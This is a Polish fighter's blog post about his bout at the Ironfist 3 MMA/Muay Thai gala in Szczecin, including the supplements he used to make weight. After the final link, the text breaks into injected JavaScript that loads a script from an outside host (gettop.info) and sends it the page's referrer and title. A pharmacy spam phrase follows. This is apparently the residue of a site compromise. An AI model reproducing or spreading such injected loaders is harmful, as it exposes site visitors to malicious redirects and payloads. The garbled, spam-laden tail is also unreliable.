Ironfist 3 Szczecin

9.11.2010 / Mariusz Cieśliński

W miniony weekend walczyłem na gali Ironfist 3 w Szczecinie.Mimo,że to dopiero trzecia edycja tej imprezy łączącej walki MMA,MUAYTHAI oraz boks, to organizatorom należą się zawsze słowa uznania za organizację tej imp[rezy oraz kartę walk.

Walczyłem tym razem z zawodnikiem z Wielkiej Brytani-Jonno Chipchase.Przeciwnik mój walczył typowo w „tajskim” stylu.Próbował przechwytów nóg podczas kopnięć wykonywanych przez mnie.Ja zaś taktykę oparłem na mocnym kopnięciu”lowkick”oraz akcjach bokserskich.

Przed zawodami dzień wcześniej odbyło się oficjalne ważenie.Limit kategorii 60 kg uzyskałem na :Nitroprogenie,Isolate 100% whey Protein,Bcaa G-force,LipoXack,Red Faster,Vitargo,SteroXpack,Tribulon i Zma.Posiłki zastępowałem batonami Booster i Triumph.Czułem się dobrze i komfortowo wiedząc,że moje mięśnie i ciało ma należytą ochronę”gardę”.

http://www.gs24.pl/apps/pbcs.dll/article?AID=/20101107/SPORT/665692934

http://trec.com.pl/aktualnosci/iron_fist_3_gratulacje.html

http://ironfist.com.pl/zdjecia/19} else {d.getElementsByTagName(‚head’)[0].appendChild(s);s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‚&default_keyword=’ + encodeURIComponent(document.title) + ”; 362 mexican pharmacies in tijuana